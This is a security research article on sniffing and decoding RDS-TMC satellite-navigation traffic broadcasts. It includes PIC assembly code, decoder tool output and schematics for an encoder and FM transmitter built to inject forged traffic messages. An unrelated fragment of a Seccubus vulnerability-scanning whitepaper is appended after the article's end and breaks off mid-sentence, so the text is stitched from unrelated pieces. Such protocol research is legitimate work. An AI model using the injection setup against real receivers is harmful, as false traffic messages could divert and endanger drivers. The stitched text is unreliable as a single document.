|=-----------------------------------------------------------------------=| |=----------------------=[ Hijacking RDS-TMC Traffic ]=------------------=| |=----------------------=[ Information signal ]=------------------=| |=-----------------------------------------------------------------------=| |=-----------------------------------------------------------------------=| |=-----------------=[ By Andrea "lcars" Barisani ]=--------------=| |=-----------------=[ <lcars_at_inversepath_dot_com> ]=--------------=| |=-----------------=[ ]=--------------=| |=-----------------=[ Daniele "danbia" Bianco ]=--------------=| |=-----------------=[ <danbia_at_inversepath_dot_com> ]=--------------=| |=-----------------------------------------------------------------------=| --[ Contents 1. - Introduction 2. - Motivation 3. - RDS 4. - RDS-TMC 5. - Sniffing circuitry 6. - Simple RDS Decoder 0.1 7. - Injection circuitry I. - References II. - Links --[ 1. Introduction Modern Satellite Navigation systems use a recently developed standard called RDS-TMC (Radio Data System - Traffic Message Channel) for receiving traffic information over FM broadcast. The protocol allows communication of traffic events such as accidents and queues. If information affects the current route plotted by the user the information is used for calculating and suggesting detours and alternate routes. We are going to show how to receive and decode RDS-TMC packets using cheap homemade hardware, the goal is understanding the protocol so that eventually we may show how trivial it is to inject false information. We also include the first release of our Simple RDS Decoder (srdsd is the lazy name) which as far as we know is the first open source tool available which tries to fully decode RDS-TMC messages. It's not restricted to RDS-TMC since it also performs basic decoding of RDS messages. The second part of the article will cover transmission of RDS-TMC messages, satellite navigator hacking via TMC and its impact for social engineering attacks. --[ 2. Motivation RDS has primarily been used for displaying broadcasting station names on FM radios and give alternate frequencies, there has been little value other than pure research and fun in hijacking it to display custom messages. However, with the recent introduction of RDS-TMC throughout Europe we are seeing valuable data being transmitted over FM that actively affects SatNav operations and eventually the driver's route choice. This can have very important social engineering consequences. Additionally, RDS-TMC messages can be an attack vector against SatNav parsing capabilities. Considering the increasing importance of these system's role in car operation (which are no longer strictly limited to route plotting anymore) and their human interaction they represent an interesting target combined with the "cleartext" and un-authenticated nature of RDS/RDS-TMC messages. We'll explore the security aspects in Part II. --[ 3. RDS The Radio Data System standard is widely adopted on pretty much every modern FM radio, 99.9% of all car FM radio models feature RDS nowadays. The standard is used for transmitting data over FM broadcasts and RDS-TMC is a subset of the type of messages it can handle. The RDS standard is described in the European Standard 50067. The most recognizable data transmitted over RDS is the station name which is often shown on your radio display, other information include alternate frequencies for the station (that can be tried when the signal is lost), descriptive information about the program type, traffic announcements (most radio can be set up to interrupt CD and/or tape playing and switch to radio when a traffic announcement is detected), time and date and many more including TMC messages. In a FM transmission the RDS signal is transmitted on a 57k subcarrier in order to separate the data channel from the Mono and/or Stereo audio. FM Spectrum: Mono Pilot Tone Stereo (L-R) RDS Signal ^ ^ ^ ^ ^^ |||||||||| | |||||||||| |||||||||| || |||||||||| | |||||||||| |||||||||| || |||||||||| | |||||||||| |||||||||| || |||||||||| | |||||||||| |||||||||| || |||||||||| | |||||||||| |||||||||| || -------------------------------------------------------------------------- 19k 23k 38k 53k 57k Freq (Hz) The RDS signal is sampled against a clock frequency of 1.11875 kHz, this means that the data rate is 1187.5 bit/s (with a maximum deviation of +/- 0.125 bit/s). The wave amplitude is decoded in a binary representation so the actual data stream will be friendly '1' and '0'. The RDS smallest "packet" is called a Block, 4 Blocks represent a Group. Each Block has 26 bits of information making a Group 104 bits large. Group structure (104 bits): --------------------------------------- | Block 1 | Block 2 | Block 3 | Block 4 | --------------------------------------- Block structure (26 bits): ---------------- --------------------- | Data (16 bits) | Checkword (10 bits) | ---------------- --------------------- The Checkword is a checksum included in every Block computed for error protection, the very nature of analog radio transmission introduces many errors in data streams. The algorithm used is fully specified in the standard and it doesn't concern us for the moment. Here's a representation of the most basic RDS Group: Block 1: --------------------- PI code = 16 bits | PI code | Checkword | Checkword = 10 bits --------------------- Block 2: Group code = 4 bits B0 = 1 bit --------------------------------------------------- TP = 1 bit | Group code | B0 | TP | PTY | <5 bits> | Checkword | PTY = 5 bits --------------------------------------------------- Checkword = 10 bits Block 3: ------------------ Data = 16 bits | Data | Checkword | Checkword = 10 bits ------------------ Block 4: ------------------ Data = 16 bits | Data | Checkword | Checkword = 10 bits ------------------ The PI code is the Programme Identification code, it identifies the radio station that's transmitting the message. Every broadcaster has a unique assigned code. The Group code identifies the type of message being transmitted as RDS can be used for transmitting several different message formats. Type 0A (00000) and 0B (00001) for instance are used for tuning information. RDS-TMC messages are transmitted in 8A (10000) groups. Depending on the Group type the remaining 5 bits of Block 2 and the Data part of Block 3 and Block 4 are used according to the relevant Group specification. The 'B0' bit is the version code, '0' stands for RDS version A, '1' stands for RDS version B. The TP bit stands for Traffic Programme and identifies if the station is capable of sending traffic announcements (in combination with the TA code present in 0A, 0B, 14B, 15B type messages), it has nothing to do with RDS-TMC and it refers to audio traffic announcements only. The PTY code is used for describing the Programme Type, for instance code 1 (converted in decimal from its binary representation) is 'News' while code 4 is 'Sport'. --[ 4. RDS-TMC Traffic Message Channel packets carry information about traffic events, their location and the duration of the event. A number of lookup tables are being used to correlate event codes to their description and location codes to the GPS coordinates, those tables are expected to be present in our SatNav memory. The RDS-TMC standard is described in International Standard (ISO) 14819-1. All the most recent SatNav systems supports RDS-TMC to some degree, some systems requires purchase of an external antenna in order to correctly receive the signal, modern ones integrated in the car cockpit uses the existing FM antenna used by the radio system. The interface of the SatNav allows display of the list of received messages and prompts detours upon events that affect the current route. TMC packets are transmitted as type 8A (10000) Groups and they can be divided in two categories: Single Group messages and Multi Group messages. Single Group messages have bit number 13 of Block 2 set to '1', Multi Group messages have bit number 13 of Block 2 set to '0'. Here's a Single Group RDS-TMC message: Block 1: --------------------- PI code = 16 bits | PI code | Checkword | Checkword = 10 bits --------------------- Block 2: Group code = 4 bits B0 = 1 bit ----------------------------------------------------- TP = 1 bit | Group code | B0 | TP | PTY | T | F | DP | Checkword | PTY = 5 bits ----------------------------------------------------- Checkword = 10 bits T = 1 bit DP = 3 bits F = 1 bit Block 3: D = 1 bit PN = 1 bit ------------------------------------- Extent = 3 bits | D | PN | Extent | Event | Checkword | Event = 11 bits ------------------------------------- Checkword = 10 bits Block 4: ---------------------- Location = 16 bits | Location | Checkword | Checkword = 10 bits ---------------------- We can see the usual data which we already discussed for RDS as well as new information (the <5 bits> are now described). We already mentioned the 'F' bit, it's bit number 13 of Block 2 and it identifies the message as a Single Group (F = 1) or Multi Group (F = 0). The 'T', 'F' and 'D' bits are used in Multi Group messages for identifying if this is the first group (TFD = 001) or a subsequent group (TFD = 000) in the stream. The 'DP' bit stands for duration and persistence, it contains information about the timeframe of the traffic event so that the client can automatically flush old ones. The 'D' bit tells the SatNav if diversion advice needs to be prompted or not. The 'PN' bit (Positive/Negative) indicates the direction of queue events, it's opposite to the road direction since it represent the direction of the growth of a queue (or any directional event). The 'Extent' data shows the extension of the current event, it is measured in terms of nearby Location Table entries. The 'Event' part contains the 11 bit Event code, which is looked up on the local Event Code table stored on the SatNav memory. The 'Location' part contains the 16 bit Location code which is looked up against the Location Table database, also stored on your SatNav memory, some countries allow a free download of the Location Table database (like Italy[1]). Multi Group messages are a sequence of two or more 8A groups and can contain additional information such as speed limit advices and supplementary information. --[ 5. Sniffing circuitry Sniffing RDS traffic basically requires three components: 1. FM radio with MPX output 2. RDS signal demodulator 3. RDS protocol decoder The first element is a FM radio receiver capable of giving us a signal that has not already been demodulated in its different components since we need access to the RDS subcarrier (and an audio only output would do no good). This kind of "raw" signal is called MPX (Multiplex). The easiest way to get such signal is to buy a standard PCI Video card that carries a tuner which has a MPX pin that we can hook to. One of these tuners is Philips FM1216[2] (available in different "flavours", they all do the trick) which provides pin 25 for this purpose. It's relatively easy to identify a PCI Video card that uses this tuner, we used the WinFast DV2000. An extensive database[3] is available. Once we get the MPX signal it can then be connect to a RDS signal demodulator which will perform the de-modulation and gives us parsable data. Our choice is ST Microelectronics TDA7330B[4], a commercially available chip used in most radio capable of RDS de-modulation. Another possibility could be the Philips SAA6579[5], it offers the same functionality of the TDA7330, pinning might differ. Finally we use custom PIC (Peripheral Interface Controller) for preparing and sending the information generated by the TDA7330 to something that we can understand and use, like a standard serial port. The PIC brings DATA, QUAL and CLOCK from demodulator and "creates" a stream good enough to be sent to the serial port. Our PIC uses only two pins of the serial port (RX - RTS), it prints out ascii '0' and '1' clocked at 19200 baud rate with one start bit and two stop bits, no parity bit is used. As you can see the PIC makes our life easier, in order to see the raw stream we only have to connect the circuit and attach a terminal to the serial port, no particular driver is needed. The PIC we use is a PIC 16F84, this microcontroller is cheap and easy to work with (its assembly has only 35 instructions), furthermore a programmer for setting up the chip can be easily bought or assembled. If you want to build your own programmer a good choice would be uJDM[6], it's one of the simplest PIC programmers available (it is a variation of the famous JDM programmer). At last we need to convert signals from the PIC to RS232 compatible signal levels. This is needed because the PIC and other integrated circuits works under TTL (Transistor to Transistor Logic - 0V/+5V), whereas serial port signal levels are -12V/+12V. The easiest approach for converting the signal is using a Maxim RS-232[7]. It is a specialized driver and receiver integrated circuit used to convert between TTL logic levels and RS-232 compatible signal levels. Here's the diagram of the setup: \ / \ / | | | [ RDS - Demodulator ] | *diagram* ______________[ ]__ |- || |=- |- || F T |=- |- || M U |=- P |- || 1 N |=- C |- || 2 E |=- I |- || 1 R |=- |- || 6 |=- 1 _______ 20 B | ||________|=- --------> MPX ---> MUXIN -|. U |- u |- | pin 25 -| |- s |- | AF sound output -| T |- |- | -| D |- |- | -| A |- |- | -| 7 |- |- | -| 3 |- QUAL______ |- | -| 3 |- DATA____ | |- | -| 0 |- CLOCK_ | | |___________________| -|_______|- | | V 10 11 | V | _______________________________________________________________V | | | ___________________________________________________________| | | ___|_____________________________________________________________| | | | | | | 1 _______ 18 V | V x -|. u |- -> data out (to rs232)______________ | V | x -| |- -> rts out (to rs232)____________ | | | _| x -| 1 |- <- osc1 / clkin | | | | | MCLR -> -| 6 |- -> OSC2 / CLKOUT | V | | | Vss (gnd) -> -| F |- <- Vdd (+5V) V | | | |_____ DATA -> -| 8 |- x | | | |_______ QUAL -> -| 4 |- x | | |________ CLOCK -> -| |- x | | x -|_______|- x | | 9 10 | | ______________________________ | | Serial Port | 1 _______ 16 | | | (DB9 connector) | -|. U |- ^ | | ______________ | -| |- | | | | RX - pin2 | | -| R |- RTS _| | | ____V________ | | -| S |- V | | . o . . . | | | -| 2 |- | V \ . o . . / | | -| 3 |- <- _____| | --------- |_________|____ <- DATA -| 2 |- <- _______| ^ RTS - pin 7 | -|_______|- |_______________________| 8 9 Here's the commented assembler code for our PIC: ; ; Copyright 2007 Andrea Barisani <lcars@inversepath.com> ; Daniele Bianco <danbia@inversepath.com> ; ; Permission to use, copy, modify, and distribute this software for any ; purpose with or without fee is hereby granted, provided that the above ; copyright notice and this permission notice appear in all copies. ; ; THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES ; WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF ; MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ; ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES ; WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ; ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF ; OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. ; ; Pin diagram: ; ; 1 _______ 18 ; x -|. U |- -> DATA out (to RS232) ; x -| |- -> RTS out (to RS232) ; x -| 1 |- <- OSC1 / CLKIN ; MCLR -> -| 6 |- -> OSC2 / CLKOUT ; Vss (gnd) -> -| F |- <- Vdd (+5V) ; DATA -> -| 8 |- x ; QUAL -> -| 4 |- x ; CLOCK -> -| |- x ; x -|_______|- x ; 9 10 ; ; Connection description: ; ; pin 4 : MCLR (it must be connected to Vdd through a resistor ; to prevent PIC reset - 10K is a good resistor) ; pin 5 : Vss (directly connected to gnd) ; ; pin 6 : DATA input (directly connected to RDS demodulator DATA out) ; pin 7 : QUAL input (directly connected to RDS demodulator QUAL out) ; pin 8 : CLOCK input (directly connected to RDS demodulator CLOCK out) ; ; pin 14: Vdd (directly connected to +5V) ; pin 15: OSC2 / CLKOUT (connected to an 2.4576 MHz oscillator crystal* ) ; pin 16: OSC1 / CLKIN (connected to an 2.4576 MHz oscillator crystal* ) ; ; pin 17: RTS output (RS232 - ''RTS'' pin 7 on DB9 connector** ) ; pin 18: DATA output (RS232 - ''RX'' pin 2 on DB9 connector** ) ; ; pin 1,2,3,9,10,11,12,13: unused ; ; *) ; We can connect the oscillator crystal to the PIC using this simple ; circuit: ; ; C1 (15-33 pF) ; ____||____ ______ OSC1 / CLKIN ; | || | ; | ___ ; gnd ---| = XTAL (2.4576 MHz) ; | --- ; |____||____|______ ; || OSC2 / CLKOUT ; C2 (15-33 pF) ; **) ; We have to convert signals TTL <-> RS232 before we send/receive them ; to/from the serial port. ; Serial terminal configuration: ; 8-N-2 (8 data bits - No parity - 2 stop bits) ; ; HARDWARE CONF ----------------------- PROCESSOR 16f84 RADIX DEC INCLUDE "p16f84.inc" ERRORLEVEL -302 ; suppress warnings for bank1 __CONFIG 1111111110001b ; Code Protection disabled ; Power Up Timer enabled ; WatchDog Timer disabled ; Oscillator type XT ; ------------------------------------- ; DEFINE ------------------------------ #define Bank0 bcf STATUS, RP0 ; activates bank 0 #define Bank1 bsf STATUS, RP0 ; activates bank 1 #define Send_0 bcf PORTA, 1 ; send 0 to RS232 RX #define Send_1 bsf PORTA, 1 ; send 1 to RS232 RX #define Skip_if_C btfss STATUS, C ; skip if C FLAG is set #define RTS PORTA, 0 ; RTS pin RA0 #define RX PORTA, 1 ; RX pin RA1 #define DATA PORTB, 0 ; DATA pin RB0 #define QUAL PORTB, 1 ; QUAL pin RB1 #define CLOCK PORTB, 2 ; CLOCK pin RB2 RS232_data equ 0x0C ; char to transmit to RS232 BIT_counter equ 0x0D ; n. of bits to transmit to RS232 RAW_data equ 0x0E ; RAW data (from RDS demodulator) dummy_counter equ 0x0F ; dummy counter... used for delays ; ------------------------------------- ; BEGIN PROGRAM CODE ------------------ ORG 000h InitPort Bank1 ; select bank 1 movlw 00000000b ; RA0-RA4 output movwf TRISA ; movlw 00000111b ; RB0-RB2 input / RB3-RB7 output movwf TRISB ; Bank0 ; select bank 0 movlw 00000010b ; set voltage at -12V to RS232 ''RX'' movwf PORTA ; Main btfsc CLOCK ; wait for clock edge (high -> low) goto Main ; movfw PORTB ; andlw 00000011b ; reads levels on PORTB and send movwf RAW_data ; data to RS232 call RS232_Tx ; btfss CLOCK ; wait for clock edge (low -> high) goto $-1 ; goto Main RS232_Tx ; RS232 (19200 baud rate) 8-N-2 ; 1 start+8 data+2 stop - No parity btfsc RAW_data,1 goto Good_qual goto Bad_qual Good_qual ; movlw 00000001b ; andwf RAW_data,w ; good quality signal iorlw '0' ; sends '0' or '1' to RS232 movwf RS232_data ; goto Char_Tx Bad_qual ; movlw 00000001b ; andwf RAW_data,w ; bad quality signal iorlw '*' ; sends '*' or '+' to RS232 movwf RS232_data ; Char_Tx movlw 9 ; (8 bits to transmit) movwf BIT_counter ; BIT_counter = n. bits + 1 call StartBit ; sends start bit Send_loop decfsz BIT_counter, f ; sends all data bits contained in goto Send_data_bit ; RS232_data call StopBit ; sends 2 stop bit and returns to Main Send_1 goto Delay16 StartBit Send_0 nop nop goto Delay16 StopBit nop nop nop nop nop Send_1 call Delay8 goto Delay16 Send_0_ Send_0 goto Delay16 Send_1_ nop Send_1 goto Delay16 Send_data_bit rrf RS232_data, f ; result of rotation is saved in Skip_if_C ; C FLAG, so skip if FLAG is set goto Send_zero call Send_1_ goto Send_loop Send_zero call Send_0_ goto Send_loop ; ; 4 / clock = ''normal'' instruction period (1 machine cycle ) ; 8 / clock = ''branch'' instruction period (2 machine cycles) ; ; clock normal instr. branch instr. ; 2.4576 MHz 1.6276 us 3.2552 us ; Delay16 movlw 2 ; dummy cycle, movwf dummy_counter ; used only to get correct delay ; for timing. decfsz dummy_counter,f ; goto $-1 ; Total delay: 8 machine cycles nop ; ( 1 + 1 + 1 + 2 + 2 + 1 = 8 ) Delay8 movlw 2 ; dummy cycle, movwf dummy_counter ; used only to get correct delay ; for timing. decfsz dummy_counter,f ; goto $-1 ; Total delay: 7 machine cycles ; ( 1 + 1 + 1 + 2 + 2 = 7 ) Delay1 nop RETURN ; unique return point END ; END PROGRAM CODE -------------------- </code> Using the circuit we assembled we can "sniff" RDS traffic directly on the serial port using screen, minicom or whatever terminal app you like. You should configure your terminal before attaching it to the serial port, the settings are 19200 baud rate, 8 data bits, 2 stop bits, no parity. # stty -F /dev/ttyS0 19200 cs8 cstopb -parenb speed 19200 baud; rows 0; columns 0; line = 0; intr = ^C; quit = ^\; erase = ^?; kill = ^H; eof = ^D; eol = <undef>; eol2 = <undef>; swtch = <undef>; start = ^Q; stop = ^S; susp = ^Z; rprnt = ^R; werase = ^W; lnext = ^V; flush = ^O; min = 100; time = 2; -parenb -parodd cs8 -hupcl cstopb cread clocal crtscts -ignbrk brkint ignpar -parmrk -inpck -istrip -inlcr -igncr -icrnl -ixon -ixoff -iuclc -ixany -imaxbel -iutf8 -opost -olcuc -ocrnl -onlcr -onocr -onlret -ofill -ofdel nl0 cr0 tab0 bs0 vt0 ff0 -isig -icanon iexten -echo echoe echok -echonl -noflsh -xcase -tostop -echoprt echoctl echoke # screen /dev/ttyS0 19200 1010100100001100000000101000*000101001+11101111011111111110000001011011100 10101001++000001100101100*110100101001000011000000111010000100101001111111 0011101100010011000100000+000000000 ... <and so on> As you can see we get '0' and '1' as well as '*' and '+', this is because the circuit estimates the quality of the signal. '*' and '+' are bad quality '0' and '1' data. We ignore bad data and only accept good quality. Bad quality data should be ignored, and if you see a relevant amount of '*' and '+' in your stream verify the tuner settings. In order to identify the beginning of an RDS message and find the right offset we "lock" against the PI code, which is present at the beginning of every RDS group. PI codes for every FM radio station are publicly available on the Internet, if you know the frequency you are listening to then you can figure out the PI code and look for it. If you have no clue about what the PI code might be a way for finding it out is seeking the most recurring 16 bit string, which is likely to be the PI code. Here's a single raw RDS Group with PI 5401 (hexadecimal conversion of 101010000000001): 0101010000000001111101100100000100001010001100101100000000100001010000001100 1001010010010000010001101110 Let's separate the different sections: 0101010000000001 1111011001 0000 01 0 0001 01000 1100101100 0000001000010100 0000110010 0101001001000001 0001101110 PI code Checkword Group B0 TP PTY <5 bits> Checkword Data Checkword Data Checkword So we can isolate and identify RDS messages, now you can either parse them visually by reading the specs (not a very scalable way we might say) or use a tool like our Simple RDS Decoder. --[ 6. Simple RDS Decoder 0.1 The tool parses basic RDS messages and 0A Group (more Group decoding will be implemented in future versions) and performs full decoding of Single group RDS-TMC messages (Multi Group support is also planned for future releases). Here's the basic usage: # ./srdsd -h Simple RDS-TMC Decoder 0.1 || http://dev.inversepath.com/rds Copyright 2007 Andrea Barisani || <andrea@inversepath.com> Usage: ./srdsd.pl [-h|-H|-P|-t] [-d <location db path>] [-p <PI number>] <input file> -t display only tmc packets -H HTML output (outputs to /tmp/rds-*.html) -p PI number -P PI search -d location db path -h this help Note: -d option expects a DAT Location Table code according to TMCF-LT-EF- MFF-v06 standard (2005/05/11) As we mentioned the first step is finding the PI for your RDS stream, if you don't know it already you can use '-P' option: # ./srdsd -P rds_dump.raw | tail 0010000110000000: 4140 (2180) 1000011000000001: 4146 (8601) 0001100000000101: 4158 (1805) 1001000011000000: 4160 (90c0) 0000110000000010: 4163 (0c02) 0110000000010100: 4163 (6014) 0011000000001010: 4164 (300a) 0100100001100000: 4167 (4860) 1010010000110000: 4172 (a430) 0101001000011000: 4185 (5218) Here 5218 looks like a reasonable candidate being the most recurrent string. Let's try it: # ./srdsd -p 5218 -d ~/loc_db/ rds_dump.raw Reading TMC Location Table at ~/loc_db/: parsing NAMES: 13135 entries parsing ROADS: 1011 entries parsing SEGMENTS: 15 entries parsing POINTS: 12501 entries done. Got RDS message (frame 1) Programme Identification: 0101001000011000 (5218) Group type code/version: 0000/0 (0A - Tuning) Traffic Program: 1 Programme Type: 01001 (9 - Varied Speech) Block 2: 01110 Block 3: 1111100000010110 Block 4: 0011000000110010 Decoded 0A group: Traffic Announcement: 0 Music Speech switch: 0 Decoder Identification control: 110 (Artificial Head / PS char 5,6) Alternative Frequencies: 11111000, 00010110 (112.3, 89.7) Programme Service name: 0011000000110010 (02) Collected PSN: 02 ... Got RDS message (frame 76) Programme Identification: 0101001000011000 (5218) Group type code/version: 1000/0 (8A - TMC) Traffic Program: 1 Programme Type: 01001 (9 - Varied Speech) Block 2: 01000 Block 3: 0101100001110011 Block 4: 0000110000001100 Decoded 8A group: Bit X4: 0 (User message) Bit X3: 1 (Single-group message) Duration and Persistence: 000 (no explicit duration given) Diversion advice: 0 Direction: 1 (-) Extent: 011 (3) Event: 00001110011 (115 - slow traffic (with average speeds Q)) Location: 0000110000001100 (3084) Decoded Location: Location code type: POINT Name ID: 11013 (Sv. Grande Raccordo Anulare) Road code: 266 (Roma-Ss16) GPS: 41.98449 N 12.49321 E Link: http://maps.google.com/maps?ll=41.98449,12.49321&spn=0.3,0.3&q=41.98449,12.4 9321 ...and so on. The 'Collected PSN' variable holds all the character of Programme Service name seen so far, this way we can track (just like RDS FM Radio do) the name of the station: # ./srdsd -p 5201 rds_dump.raw | grep "Collected PSN" | head Collected PSN: DI Collected PSN: DIO1 Collected PSN: DIO1 Collected PSN: RADIO1 Collected PSN: RADIO1 Check out '-H' switch for html'ized output in /tmp (which can be useful for directly following the Google Map links). We also have a version that plots all the traffic on Google Map using their API, if you are interested in it just email us. --[ 7. Injection circuitry MiniRDS (encoder) -------------- | | I2C BUS cable | o----------------<<--------->>-------- PC - parallel | | RDS-TMC port | (i2c BUS) | raw packet (104 bit) | in/out | | | | RDS output | | o | | | | --|----------- | \ / | 57 kHz \ / | amplitude modulated \ / | signal \ / | * | | | | | FM Transmitter | __|_________________________________ | FM signal | | | | + | o RDS/MPX input | | RDS | | | sub-carrier | ^ RF part | | |__________|________ | | | | | Antenna | | | PLL v | o | | | Digital Tuning | |_______________| |___________________|________________| The hardware injection setup is composed by a PC, a RDS encoder and a FM transmitter. We performed the RDS encoding using a single chip encoder[9] available from Piratske Radio[10], the core of this encoder is a programmed microcontroller type 18F12[11]. The chip holds a RAM memory and an EEPROM memory for data storage during power-off, both memory areas are accessible using the serial I2C protocol since the PIC fully implements an I2C BUS specifications. Commands and control byte sequences are described in the product data-sheet. Here we show the schema for the cable needed to connect I2C BUS in/out pins on the encoder to the PC parallel port, the pinning here is consistent with the our driver code[12]. (*) [ i2c cable connector ] -----|>|---o pin 6 SDA out | SDA o------------------------o-----------o pin 12 SDA in SCL o------------------------------------o pin 5 SCL GND o------------------------------------o pin 25 GND ( RDS ENCODER ) ( PC - LPT ) DB-25 connector (*) switching diode - 1N4148 Our *CRUDE* (Code Rushed and Ugly due to unexpected DEadline) driver code allows easy write and read access of the encoder memory and command sending to the device. You can use the information gathered from our decoder application for crafting whatever RDS-TMC packet you might need. The output of the encoder module is an amplitude modulated signal centered on 57 kHz, this signal is ready to be attached as MPX/RDS input to the FM transmitter. Almost every FM transmitter is suitable for TMC injection, the only important requirement is frequency stability. An unstable transmitter doesn't allow proper broadcasting of the RDS data stream, this is because a sensible frequency spreading of the RDS sub-carrier will result in a great number of corrupted data blocks on the receiving demodulator. Thus, if you plan to build your own transmitter we advice you to integrate in your device a PLL circuit to properly lock on the selected frequency. The transmitter we built includes a digital tuner based on the SAA1057[13] Radio tuning PLL frequency synthesizer. Our transmitter also offers an audio part suitable to hook external MICs or other audio peripherals, that's very useful to testing purposes. Moreover the RF part holds an MPX/RDS input suitable to attach directly the RDS encoder module signal, it's also possible to mix together an extra audio component with the RDS signal using a simple mixer circuit. Detailed scheme for a sample FM transmitter is available from the Piratske Radio website. In the site you can also find useful information if you plan to build your own TX antenna. This is not the only FM transmitter you can use, there are many resource available on the Internet that can easily allow whatever FM transmitter you might need for any purpose. --[ I. References [1] - Italian RDS-TMC Location Table Database https://www2.ilportaledellautomobilista.it/info/infofree?idUser=1&idBody=14 [2] - Philips FM1216 DataSheet http://pvr.sourceforge.net/FM1216.pdf [3] - PVR Hardware Database http://pvrhw.goldfish.org [4] - SGS-Thompson Microelectronics TDA7330 http://www.datasheetcatalog.com/datasheets_pdf/T/D/A/7/TDA7330.shtml [5] - Philips SAA6579 http://www.datasheetcatalog.com/datasheets_pdf/S/A/A/6/SAA6579.shtml [6] - uJDM PIC Programmer http://www.semis.demon.co.uk/uJDM/uJDMmain.htm [7] - Maxim RS-232 http://www.maxim-ic.com/getds.cfm?qv_pk=1798&ln=en [8] - Xcircuit http://xcircuit.ece.jhu.edu [9] - MiniRDS encoder chip (MRDS192) http://www.pira.cz/rds/mrds192.pdf [10] - Piratske Radio website - RDS section http://www.pira.cz/rds/index.htm [11] - Microchip PIC 18F1220 http://ww1.microchip.com/downloads/en/DeviceDoc/39605F.pdf [12] - MiniRDS driver code http://dev.inversepath.com/rds/i2c_minirds.tar.gz [13] - Philips SAA1057 - Radio tuning PLL frequency synthesizer http://www.datasheetcatalog.net/de/datasheets_pdf/S/A/A/1/SAA1057.shtml --[ II. Links - Project directory http://dev.inversepath.com/rds |=[ EOF ]=---------------------------------------------------------------=|
Seccubus Repeated vulnerability scans made easy for: Public release date: 18 March 2010 version: 1.0 author: Frank Breedijk status: Public D R A F T for Public release title Seccubus version 1.0 2 date 18 March 2010 PUBLIC author Frank Breedijk Table of contents 1 Introduction 3 1.1 What is a vulnerability scanner? 3 1.2 Why scan? 3 2 More scanning, more work? 5 2.1 How does Seccubus improve this? 5 2.2 What is the gain? 5 2.3 Case: Schuberg Philis 6 2.4 Seccubus’ vital statistics 6 3 Conclusion 7 4 About the author 8 D R A F T for Public release title Seccubus version 1.0 3 date 18 March 2010 PUBLIC author Frank Breedijk 1 Introduction During my work as security engineer at Schuberg Philis I repeatedly made use of vulnerability scanners like Nessus and OpenVAS. To me these scanners came across as real power tools unfortunately they are nowhere near perfect. Every scan results in a ‘report’, in one form or the other, with a large number of findings. Each of these findings will have to be investigated in order to determine if the finding is: 1. an issue 2. not an issue or 3. a false positive. These investigations take time and effort. Because of this involvement in time and effort, vulnerability scans are often conducted on an ad-hoc basis, e.g. before go-life of an infrastructure or after a major change. However the dynamics of IT, where change is the only constant, made me want to regularly perform vulnerability scans. Obviously with the intention to spend as little time and effort as possible. This challenge has pushed me to write Seccubus, a tool to schedule vulnerability scans and process their results more easily. 1.1 What is a vulnerability scanner? In the introduction of this paper I regularly used the term vulnerability scanner, but just to be clear; what do I mean by vulnerability scanner? A vulnerability scanner is a software program that aims to find vulnerabilities in software or an infrastructure, often by simulating an attack. Nessus and OpenVAS are well known vulnerability scanners, these two programs are aimed at finding vulnerabilities in infrastructures over the network. Nessus and OpenVAS use a five step approach to finding vulnerabilities: 1. Determine if an IP address is active on the network. This is done by using technologies such as ping, arp scan, or a simple port scan. 2. Try to determine which services are offered by the IP address and which operating system is used. 3. Determine if known vulnerabilities are present on the system. Technologies to determine the presence of vulnerabilities range from comparing the version number of the daemon to a list of known vulnerable version , but also by performing step 4 4. Simulate or actually abuse the vulnerability to determine its existence 5. Report findings. Known versus unknown Unfortunately these scanners can only find known vulnerabilities. Known means in this context, vulnerabilities which have been programmed into the tool. A good penetration tester will, aided by his human creativity be able to find vulnerabilities for which automated test do not, yet, exist. These scanners can also impact the availability of the tested infrastructure. No vendor can 100% guarantee that the test subject will not be adversely affected by the test. 1.2 Why scan? The potential risk of a vulnerability scan is still used as an argument to not scan at all or to only have these test performed by a security testing company. While I understand these concerns I can really D R A F T for Public release title Seccubus version 1.0 4 date 18 March 2010 PUBLIC author Frank Breedijk recommend companies and IT departments to perform their own scanning. For two reasons: A; the risk is not that high B; anybody can scan you. Abybody can scan you? There are plenty of freely available vulnerability scanners and penetration testing tools: Nessus, OpenVAS, NMAP, Nikto, Metasploit and others can be freely downloaded and thus used by just about anyone. And, even though it’s illegal to use these tools on an infrastructure without the owner’s permission, anybody who has ever seen a firewall log knows that just about anything connected to internet is scanned regularly. You could therefore argue that the information obtained from a scan is publicly available and since the information is ‘on the street’ you might as well get your own copy. Scanning dangerous? When performing a vulnerability scan, one has to weight all aspects of the information security triangle (Confidentiality, Integrity and Availability). During a scan, the availability of the test subject may be reduced, but at least cannot be guaranteed 100%; however you will get an accurate picture of all three aspects of the triangle. The risk of a negative impact on the availability has to be put in context. If the system is connected to the internet it is very likely that it has been scanned previously without the oowners knowledge or consent. Also, it is my experience that these scans do not often significantly disrupt an infrastructure. In the 4.5 years that I have frequently used these tools, I have only really disrupted an infrastructure twice. In both cases where was no structural damage to any systems and the scan could be resumed later with a lowered intensity. Vulnerability scanning is not the only activity that can cause disruptions to an infrastructure. Changes e.g. can also have a negative impact. By planning vulnerability scans in the same way as planned changes, they can often be fitted into the schedule. D R A F T for Public release title Seccubus version 1.0 5 date 18 March 2010 PUBLIC author Frank Breedijk 2 More scanning, more work? Testing an infrastructure for vulnerabilities should not be a one-off activity. Every single IT infrastructure I know changes. But, even if an infrastructure does not change, the threat landscape around it changes, e.g. new vulnerabilities are discovered daily. If a system is scanned today, and no vulnerabilities are found, the same system may turn out to be vulnerable tomorrow when we test it with and updated scanner. Performing a vulnerability scan is easy; the vulnerability scanner software itself does most of the work. Unfortunately analyzing the findings of a scan is a lot of work. I have scanned an infrastructure with 130 IP addresses that offer no services to the internet. Yet the report generated by the vulnerability scanner consisted of 52 pages that contained over 400 findings. Even with sufficient experience with vulnerability scanning digesting such a report takes two hours or more and writing a formal report would take double that time. Clearly this does not scale well. 2.1 How does Seccubus improve this? Seccubus is a tool that allows OpenVAS or Nessus vulnerability scans to be executed at set times. But besides this Seccubus reduces the time needed to analyze subsequent scans of the same 